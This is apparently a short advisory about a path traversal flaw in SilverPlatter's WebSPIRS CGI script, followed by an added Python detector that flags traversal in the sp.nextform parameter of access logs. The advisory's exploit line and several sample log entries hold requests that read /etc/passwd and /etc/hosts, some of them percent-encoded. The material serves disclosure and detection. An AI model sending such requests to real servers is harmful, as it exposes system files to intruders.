Name: WebSPIRS CGI script "show files" Vulnerability.

About: WebSPIRS is SilverPlatter's Information Retrieval System for the World Wide Web (WWW). It is a common gateway interface (CGI) application which allows any forms-capable browser, such as Netscape, to search SilverPlatter (SP) Electronic Reference Library (ERL) databases available over the Internet. http://www.silverplatter.com.

Problem: The problem lies in incorrect validation of information the user submits through the browser, which allows the script to show any file on the system where it is installed.

Exploit: lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd

by: UkR-XblP (cuctema@ok.ru)
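
Detection: the following is an added example, not part of the original advisory and not SilverPlatter's code. It scans web-server access logs for webspirs.cgi requests whose sp.nextform value contains a parent-directory segment, including percent-encoded and double-encoded forms. The log lines, client addresses and the form name search.htm are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format); addresses and form names are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/webspirs.cgi?sp.nextform=search.htm HTTP/1.0" 200 5120
192.0.2.44 - - [01/Jan/2001:10:02:13 +0000] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 200 1843
192.0.2.44 - - [01/Jan/2001:10:02:40 +0000] "GET /cgi-bin/webspirs.cgi?sp.nextform=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1843
192.0.2.44 - - [01/Jan/2001:10:03:02 +0000] "GET /cgi-bin/webspirs.cgi?sp.nextform=%252e%252e%252fetc%252fhosts HTTP/1.0" 404 210
192.0.2.77 - - [01/Jan/2001:10:05:00 +0000] "GET /index.html?sp.nextform=../x HTTP/1.0" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_parent_segment(value):
    """True if the decoded value contains a '..' path segment (either slash style)."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def find_traversal_requests(log_text):
    """Return (client, status, decoded sp.nextform) for each suspicious webspirs.cgi request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/webspirs.cgi"):
            continue
        # parse_qsl decodes the query once; fully_decode handles extra encoding layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "sp.nextform" and has_parent_segment(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for client, status, value in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} status={status} sp.nextform={value}")
```

Flagged requests that returned status 200 are the ones to triage first, since the server answered them with content.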